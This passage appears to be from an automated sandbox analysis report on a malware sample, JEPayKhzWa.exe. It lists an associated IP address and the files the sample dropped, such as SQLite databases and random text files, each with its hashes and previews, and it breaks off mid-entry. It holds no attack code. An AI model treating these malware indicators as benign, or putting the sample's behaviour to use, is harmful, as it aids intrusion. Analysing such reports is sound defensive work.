                                                                                • 45.139.187.152
                                                                                e5Y3D1qnf9.exeGet hashmaliciousBrowse
                                                                                • 45.139.187.152

                                                                                JA3 Fingerprints

                                                                                No context

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\JEPayKhzWa.exe.log
                                                                                Process:C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):605
                                                                                Entropy (8bit):5.348572419871093
                                                                                Encrypted:false
                                                                                SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M6:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4j
                                                                                MD5:F1C17EAE806A5E2FF57C1AA433C1873E
                                                                                SHA1:6AD58A6A412CF3620F39546F1C9E8353844EED42
                                                                                SHA-256:7C73E26E04377B6D01B7579CD758F53CD7B99661529FCD1C9873EAAA5B8902E6
                                                                                SHA-512:746E9DBF1C252E3A803AA215338CE9FE8217334793FA5B72FCBB63E248321BC5ADD99724A70DEBD34CC7C4D9F8CB888828F3562758E68616584D6C03F250C0ED
                                                                                Malicious:true
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                C:\Users\user\AppData\Local\Temp\tmp16D4.tmp
                                                                                Process:C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.792852251086831
                                                                                Encrypted:false
                                                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                Malicious:false
                                                                                Reputation:high, very likely benign file
                                                                                Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Temp\tmp16D5.tmp
                                                                                Process:C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.792852251086831
                                                                                Encrypted:false
                                                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                Malicious:false
                                                                                Reputation:high, very likely benign file
                                                                                Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Temp\tmp16D6.tmp
                                                                                Process:C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.792852251086831
                                                                                Encrypted:false
                                                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                Malicious:false
                                                                                Reputation:high, very likely benign file
                                                                                Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Temp\tmp1706.tmp
                                                                                Process:C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.7006690334145785
                                                                                Encrypted:false
                                                                                SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                                                                                MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                                                                                SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                                                                                SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                                                                                SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                                                                                Malicious:false
                                                                                Reputation:high, very likely benign file
                                                                                Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Temp\tmp1707.tmp
                                                                                Process:C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.7006690334145785
                                                                                Encrypted:false
                                                                                SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                                                                                MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                                                                                SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                                                                                SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                                                                                SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                                                                                Malicious:false
                                                                                Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Temp\tmp2C38.tmp
                                                                                Process:C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1026
                                                                                Entropy (8bit):4.702862417860716
                                                                                Encrypted:false
                                                                                SSDEEP:24:JCmIDeBF63lGj/+QvH8n8JCl7odrVgKqBP68iz:4QQQvHFrTqBPXiz
                                                                                MD5:CC0686FCDF6617729D1EDF30F49501F1
                                                                                SHA1:02D629848E3D467D8143B057F003E0D7448126CD
                                                                                SHA-256:31E15305BC0579F03C51A1D6534B332F32C73ABC6D1B68BA0BDA6FCF97F593C9
                                                                                SHA-512:8BD18EB486BA6D2799329D9A8EFB3F52C3D109F5CB070290418DDE4B58756CD023857E4CAE62323C530FA0D3A60372C97D9744C1911A688D3592EABD14005F25
                                                                                Malicious:false
                                                                                Preview: DQOFHVHTMGONGZJMTUDJRBBZMRPVREMYHKGEHFUQYXZCSKHYXSDQYNTHYMAXXVSVAUOGMFIYPDCQLTHSECIYLWTRIBFEAYHUXINIFQBTJDZMINEEJPQYKGEESHWZILKBYECTPQSECVJBFSZOCCSNOVPIAHSFZWVXPNEQGUOXWPBXJRUYFARJLNHPVXAJZAMAADRKIWNDXYEBYMEBSXOJGEOURNOIBBLONDSVHAOQHPMGXZYJJTGITBJPQEBNXGZYUKARGBCVCJUHSRNNEVOIGUVCJVMNFBKNVZYQADNKMLUVPOTXVOQFRBXUSSRFMQEZCJFQXKCGKGKCVGGVBKNPTNSSMADFJLSDMVXHSOETKCENTGLOVOHUYJFTIWFHKFJRYNOXVIGPLHNBFPFOCWMNOQXWIPYAHPKRVTBFYKRBDVDUAZBSLWPPMXJXDVRCRPKOGCUKNZKBLJGIGZASUAZBLZBMGJSBNQSVTMGEWGLMNJKCSBEAGDUINAXDWMHJASNQRRDMKVXOKATATHRLEOJRPCUOAVQIESHZYWIQCSCAPIAJHBTEIYVRFEDCQDCDIYPMQVBWUEHDPIDAGKYZBMLBDUTEIFYLBSHAWEMNTPQDCSTOWSBZWQEBLVBNUWKZFUDMPBKETDOEOIXRFTDUFIBPBSUHXQTCPRPZAKDTRWMGSAVOZBNDDMDIHBSGIPOMYLKSGKUWRGKNXSOLUZDUZYQFQTKMNWLSYKVAQVIHJTFYNRTERQMIRVMLNWEIMHPIWEWIZJJRGOCBVHFGCSCPAIQYTEMYIQJKVUFAZERTMPUQSRHOZHOYABIALCSKDKHEDHJGKBYVCDZGPYPCLDCEFHWFMLSBOUUGKJFXSVKJVYVTSMIZISSWNRRWBNOMXZCOJAULXRXTNHTYWTZNFOKXVGZMTRVOSMSRMYBHKSHRCPZSSMDBJOTQQRGYIHEMZHHSWECVAOPVNLGBYHZVZPLQHOTCJNPUXICWZBLKAQFGUZPW
                                                                                C:\Users\user\AppData\Local\Temp\tmp2C39.tmp
                                                                                Process:C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1026
                                                                                Entropy (8bit):4.694579526837108
                                                                                Encrypted:false
                                                                                SSDEEP:24:9mugycA/B3wI1sZj9s/A0ikL8GO/M81cJzg+S+fBXOQklGKJx3:9mk53zsZj9s/okLklcJs+SOXlkEKJx3
                                                                                MD5:2DB1C5AA015E3F413D41884AC02B89BC
                                                                                SHA1:4872ADF2EA66D90FC5B417E4698CFF3E9A247E7B
                                                                                SHA-256:956C48539B32DB34EE3DAF968CC43EA462EE5622B66E3A7CB8705762EB0662F1
                                                                                SHA-512:C80222D65C3287D0A2FB5EB44A59737BC748C95ECDF14350A880CD653D3C39E7B47543AAE9C0CC541A16347E6E4217FB45DF4C96381D5BD820556186ED48B790
                                                                                Malicious:false
                                                                                Preview: LHEPQPGEWFOTTQHSFLPBDXLJVIUIXWOOHQVLZZIQOCFCCEMSPRTXAPYFKSXYXVFDPHPQVAQHOZTUKTMJPASSTGRXMYXGTLXIDQDVPWENFWHMFYQPBDWALBTHWFOOGFTAJOXJBCGAVMROZGTDWNNZZNJOIJGZLOORSLIGDTUKELZEAWCYJTOCEDKRQNUGUKGINWRVRIZBLNYZHTMFJHWMYODPGAYRQUTWYNKXDXGKZLBYJUDEGJGEGGHMFVTYCBCXJLBZAVKSUEGYRDAPRFIVDNDOIAEPTSNOQFOOYEDVSQTUFNNEYEEUIGJOAYENLWRFYHNPMJNOZNEWSOETCFVVGOQTOKWOVXYWOINEAHLDWXJOPISMHAIKZHVABPYANLCFQWIKUEGSZHGQKKWXTPUBFIXPWCKKSPWIPKGVNCWXTOLJGASSVRYTWKPOWKPNKRHTBSWQBFRVFTWBQEAGHCBTYUFFUUUEETCJIOPUPTHSBHQEPTFPMXQQDWNNIRISDVIUYUOMWIIEYUYGBMYTIPYRGIATEQQSHUXUTRPDXNWAGJAKJPNFAPNYOTRVPNRXEZYSZWDTXKAXFRFJSUHYWTTFWKBWWGQZXFZOXEFCXWVJDFWPMHLZGURBFMSNLFBZNHUAJHVNINGYNAEWHGWKJBYXTUXMFQKRFOCECDYREJUHNVDFGROXJCUQIMSSVRUGWEDDVIRDZYNYCRKTARFGNITFDORCBEIQVJPSIHLNFESPXNWWDSQILJLOVDKOQDNPUZXOJMYFJZKGNEFRLRATVHAMWMOUECPSNVCBIKZMPKBFTSOCSGKZGVKBNJJNGBHUKRERZCJYAICQVNEGQNFRLIKBCSEOCBSYDJBTCRZCCBTDDJNOETTYBUTBOBMQASYZUQJGKMPCMPBLFJALTHXFLNPFUSGVPUKMAQGHDSYASPYSACRNHOHKPBWPSTTZGQCXZWHSUOTIYNSQFNBEDMNZOZYYUDSPJXWXHROGZMTALITD
                                                                                C:\Users\user\AppData\Local\Temp\tmp47EC.tmp
                                                                                Process:C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                Category:dropped
                                                                                Size (bytes):73728
                                                                                Entropy (8bit):1.1874185457069584
                                                                                Encrypted:false
                                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                Malicious:false
                                                                                Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Temp\tmp47ED.tmp
                                                                                Process:C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                Category:dropped
                                                                                Size (bytes):73728
                                                                                Entropy (8bit):1.1874185457069584
                                                                                Encrypted:false
                                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                Malicious:false
                                                                                Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Temp\tmp47EE.tmp
                                                                                Process:C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                Category:dropped
                                                                                Size (bytes):73728
                                                                                Entropy (8bit):1.1874185457069584
                                                                                Encrypted:false
                                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                Malicious:false
                                                                                Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Temp\tmp6413.tmp
                                                                                Process:C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1026
                                                                                Entropy (8bit):4.702862417860716
                                                                                Encrypted:false
                                                                                SSDEEP:24:JCmIDeBF63lGj/+QvH8n8JCl7odrVgKqBP68iz:4QQQvHFrTqBPXiz
                                                                                MD5:CC0686FCDF6617729D1EDF30F49501F1
                                                                                SHA1:02D629848E3D467D8143B057F003E0D7448126CD
                                                                                SHA-256:31E15305BC0579F03C51A1D6534B332F32C73ABC6D1B68BA0BDA6FCF97F593C9
                                                                                SHA-512:8BD18EB486BA6D2799329D9A8EFB3F52C3D109F5CB070290418DDE4B58756CD023857E4CAE62323C530FA0D3A60372C97D9744C1911A688D3592EABD14005F25
                                                                                Malicious:false
                                                                                Preview: DQOFHVHTMGONGZJMTUDJRBBZMRPVREMYHKGEHFUQYXZCSKHYXSDQYNTHYMAXXVSVAUOGMFIYPDCQLTHSECIYLWTRIBFEAYHUXINIFQBTJDZMINEEJPQYKGEESHWZILKBYECTPQSECVJBFSZOCCSNOVPIAHSFZWVXPNEQGUOXWPBXJRUYFARJLNHPVXAJZAMAADRKIWNDXYEBYMEBSXOJGEOURNOIBBLONDSVHAOQHPMGXZYJJTGITBJPQEBNXGZYUKARGBCVCJUHSRNNEVOIGUVCJVMNFBKNVZYQADNKMLUVPOTXVOQFRBXUSSRFMQEZCJFQXKCGKGKCVGGVBKNPTNSSMADFJLSDMVXHSOETKCENTGLOVOHUYJFTIWFHKFJRYNOXVIGPLHNBFPFOCWMNOQXWIPYAHPKRVTBFYKRBDVDUAZBSLWPPMXJXDVRCRPKOGCUKNZKBLJGIGZASUAZBLZBMGJSBNQSVTMGEWGLMNJKCSBEAGDUINAXDWMHJASNQRRDMKVXOKATATHRLEOJRPCUOAVQIESHZYWIQCSCAPIAJHBTEIYVRFEDCQDCDIYPMQVBWUEHDPIDAGKYZBMLBDUTEIFYLBSHAWEMNTPQDCSTOWSBZWQEBLVBNUWKZFUDMPBKETDOEOIXRFTDUFIBPBSUHXQTCPRPZAKDTRWMGSAVOZBNDDMDIHBSGIPOMYLKSGKUWRGKNXSOLUZDUZYQFQTKMNWLSYKVAQVIHJTFYNRTERQMIRVMLNWEIMHPIWEWIZJJRGOCBVHFGCSCPAIQYTEMYIQJKVUFAZERTMPUQSRHOZHOYABIALCSKDKHEDHJGKBYVCDZGPYPCLDCEFHWFMLSBOUUGKJFXSVKJVYVTSMIZISSWNRRWBNOMXZCOJAULXRXTNHTYWTZNFOKXVGZMTRVOSMSRMYBHKSHRCPZSSMDBJOTQQRGYIHEMZHHSWECVAOPVNLGBYHZVZPLQHOTCJNPUXICWZBLKAQFGUZPW
                                                                                C:\Users\user\AppData\Local\Temp\tmp6414.tmp
                                                                                Process:C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1026
                                                                                Entropy (8bit):4.694579526837108
                                                                                Encrypted:false
                                                                                SSDEEP:24:9mugycA/B3wI1sZj9s/A0ikL8GO/M81cJzg+S+fBXOQklGKJx3:9mk53zsZj9s/okLklcJs+SOXlkEKJx3
                                                                                MD5:2DB1C5AA015E3F413D41884AC02B89BC
                                                                                SHA1:4872ADF2EA66D90FC5B417E4698CFF3E9A247E7B
                                                                                SHA-256:956C48539B32DB34EE3DAF968CC43EA462EE5622B66E3A7CB8705762EB0662F1
                                                                                SHA-512:C80222D65C3287D0A2FB5EB44A59737BC748C95ECDF14350A880CD653D3C39E7B47543AAE9C0CC541A16347E6E4217FB45DF4C96381D5BD820556186ED48B790
                                                                                Malicious:false
                                                                                Preview: LHEPQPGEWFOTTQHSFLPBDXLJVIUIXWOOHQVLZZIQOCFCCEMSPRTXAPYFKSXYXVFDPHPQVAQHOZTUKTMJPASSTGRXMYXGTLXIDQDVPWENFWHMFYQPBDWALBTHWFOOGFTAJOXJBCGAVMROZGTDWNNZZNJOIJGZLOORSLIGDTUKELZEAWCYJTOCEDKRQNUGUKGINWRVRIZBLNYZHTMFJHWMYODPGAYRQUTWYNKXDXGKZLBYJUDEGJGEGGHMFVTYCBCXJLBZAVKSUEGYRDAPRFIVDNDOIAEPTSNOQFOOYEDVSQTUFNNEYEEUIGJOAYENLWRFYHNPMJNOZNEWSOETCFVVGOQTOKWOVXYWOINEAHLDWXJOPISMHAIKZHVABPYANLCFQWIKUEGSZHGQKKWXTPUBFIXPWCKKSPWIPKGVNCWXTOLJGASSVRYTWKPOWKPNKRHTBSWQBFRVFTWBQEAGHCBTYUFFUUUEETCJIOPUPTHSBHQEPTFPMXQQDWNNIRISDVIUYUOMWIIEYUYGBMYTIPYRGIATEQQSHUXUTRPDXNWAGJAKJPNFAPNYOTRVPNRXEZYSZWDTXKAXFRFJSUHYWTTFWKBWWGQZXFZOXEFCXWVJDFWPMHLZGURBFMSNLFBZNHUAJHVNINGYNAEWHGWKJBYXTUXMFQKRFOCECDYREJUHNVDFGROXJCUQIMSSVRUGWEDDVIRDZYNYCRKTARFGNITFDORCBEIQVJPSIHLNFESPXNWWDSQILJLOVDKOQDNPUZXOJMYFJZKGNEFRLRATVHAMWMOUECPSNVCBIKZMPKBFTSOCSGKZGVKBNJJNGBHUKRERZCJYAICQVNEGQNFRLIKBCSEOCBSYDJBTCRZCCBTDDJNOETTYBUTBOBMQASYZUQJGKMPCMPBLFJALTHXFLNPFUSGVPUKMAQGHDSYASPYSACRNHOHKPBWPSTTZGQCXZWHSUOTIYNSQFNBEDMNZOZYYUDSPJXWXHROGZMTALITD
                                                                                C:\Users\user\AppData\Local\Temp\tmp77F7.tmp
                                                                                Process:C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                Category:dropped
                                                                                Size (bytes):73728
                                                                                Entropy (8bit):1.1874185457069584
                                                                                Encrypted:false
                                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                Malicious:false
                                                                                Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Temp\tmp7808.tmp
                                                                                Process:C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                Category:dropped
                                                                                Size (bytes):73728
                                                                                Entropy (8bit):1.1874185457069584
                                                                                Encrypted:false
                                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                Malicious:false
                                                                                Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Temp\tmp7809.tmp
                                                                                Process:C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                Category:dropped
                                                                                Size (bytes):73728
                                                                                Entropy (8bit):1.1874185457069584
                                                                                Encrypted:false
                                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                Malicious:false
                                                                                Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Temp\tmp780A.tmp
                                                                                Process:C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                Category:dropped
                                                                                Size (bytes):73728
                                                                                Entropy (8bit):1.1874185457069584
                                                                                Encrypted:false
                                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                Malicious:false
                                                                                Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Temp\tmp784A.tmp
                                                                                Process:C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                Category:dropped
                                                                                Size (bytes):73728
                                                                                Entropy (8bit):1.1874185457069584
                                                                                Encrypted:false
                                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                Malicious:false
                                                                                Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Temp\tmp784B.tmp
                                                                                Process:C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                Category:dropped
                                                                                Size (bytes):73728
                                                                                Entropy (8bit):1.1874185457069584
                                                                                Encrypted:false
                                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
